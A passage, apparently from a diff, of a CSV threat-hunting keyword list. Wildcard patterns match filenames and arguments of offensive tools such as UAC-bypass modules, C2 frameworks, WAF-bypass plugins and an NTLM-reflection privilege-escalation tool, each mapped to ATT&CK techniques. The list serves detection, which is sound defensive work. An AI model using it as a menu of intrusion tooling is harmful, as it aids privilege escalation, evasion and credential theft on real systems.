- TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BypassUAC *.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*bypassuac fodhelper*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Bypass-UAC*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*bypassUAC*.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*bypassUAC*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*--bypass-uac*--logontype*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_compdefaults*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_compmgmtlauncher*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_eventvwr*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_fodhelper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_sdclt*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_silentcleanup.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_slui*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_sluihijack.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypassuac_systempropertiesadvanced*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bypassuac_token_imp.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_vbs.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypassuac_windows_store_reg.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypassuac_wsreset*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*BypassUACTokenManipulation*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*bypassuac-x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypassuac-x64.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypassuac-x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypassuac-x86.exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*bypasswaf.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z"
+"*bypasswaf.jar*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z"
+"*bypasswaf.py*","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","323","117","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z"
+"*byt3bl33d3r*","offensive_tool_keyword","Github Username","malware and offensive tools developper ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*byt3bl33d3r/BOF-Nim*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with 
Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z"
+"*byt3bl33d3r/DeathStar*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*byt3bl33d3r/gcat*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z"
+"*byt3bl33d3r/ItWasAllADream*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z"
+"*byt3bl33d3r/pth-toolkit*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*byt3bl33d3r/SpamChannel*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
+"*-c /tmp/redsocks.conf*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
+"*-c 854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
